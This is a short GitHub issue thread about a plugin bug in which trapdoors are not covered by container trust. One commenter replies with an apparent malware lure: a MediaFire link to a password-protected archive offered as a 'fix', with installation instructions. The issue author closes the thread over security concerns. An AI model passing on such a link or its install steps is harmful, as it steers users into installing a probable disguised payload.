### ISSUE TITLE
Trapdoors are under container trust (Bug) - Security Issue

### ISSUE THREAD

**Issue by iJustLeyxo** [StarTux/Home#2]
_From the Discord bugs channel_

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by iJustLeyxo** [comment]
Closed due to security issues
